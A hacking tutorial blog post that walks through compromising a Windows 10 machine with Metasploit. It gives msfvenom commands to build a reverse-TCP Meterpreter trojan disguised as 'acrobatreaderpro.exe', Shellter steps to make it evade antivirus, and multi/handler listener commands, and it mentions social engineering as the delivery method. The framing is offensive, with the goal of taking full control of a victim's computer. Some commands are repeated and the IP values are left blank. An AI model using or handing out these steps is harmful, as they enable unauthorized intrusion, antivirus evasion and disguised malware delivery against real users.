Hacking into Windows 10 Using Metasploit Framework
Hackers always seeking zero-day exploits that can successfully bypass Windows 10’s security features. There has been extensive research into creating undetectable malware and entire GitHub projects dedicated to automating the creation of undetectable payloads such as WinPaylods, Veil v3, and TheFatRat.
A trojan or a backdoor can give access to target box remotely. Here we going to use reverse_tcp module. This is a specially crafted malware that establish a remote connection to the hacker’s machine over Transition Control Protocol from the victim machine. This allows the hacker to breach into the machine and take full control over it.
Metasploit framework is one of the best tool that I love in Kali Linux. It has both handler and payload generator. Once the payload gets executed on the target machine while then we are on listening mode in the handler section it spawns a meterpreter shell. This meterpreter shell allow us to communicate with the target system and execute shell commands. Compared to normal shell meterpreter has plenty of options. This can be done while the target is on the same LAN network or over the internet, there is no difference you just have to configure the router and payload accordingly. This process is dead simple. Follow the steps.
The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conductive environment (referred to as a Meterpreter) to manipulate compromised machines. We shall do this through a malicious executable file using Shellter.
Generating a Malicious .exe file
Generate the payload using msfvenom, set the port to 4444 and IP to your public IP or local IP depending on your target. The generated Trojan will try to connect to this IP and port when its executed. following command will generate the Trojan in .exe format.
To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet) as shown below.
A Trojan will be generated in the desktop. keep it aside and move on to handler section. you would use msfvenom as shown in the command below:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST= LPORT=4444 -o /root/acrobatreaderpro.exe
The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
Antivirus solutions work by detecting malicious signatures within executable. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST= LPORT=4444 -o /root/acrobatreaderpro.exe
Making the Executable FUD (Fully Undetectable)
To encode our executable, we shall be using Shellter. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.
Use the below code to install and run Shellter.
sudo apt-get install shellter
To launch Shellter just type Shellter on the terminal.
You will be required to enter the absolute path to the executable to make FUD. Make sure to select “Auto” mode as shown below.
Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.
The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
At this point, the executable you provided will have been made undetectable to antivirus programs.
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
The screenshot below shows what commands to issue within Metasploit.
First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler.
We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.
The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.
The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, I uploaded to drive and copy the acrobatreaderpro.exe to a Windows system within the same network as the Kali system.
sudo apt-get install shellter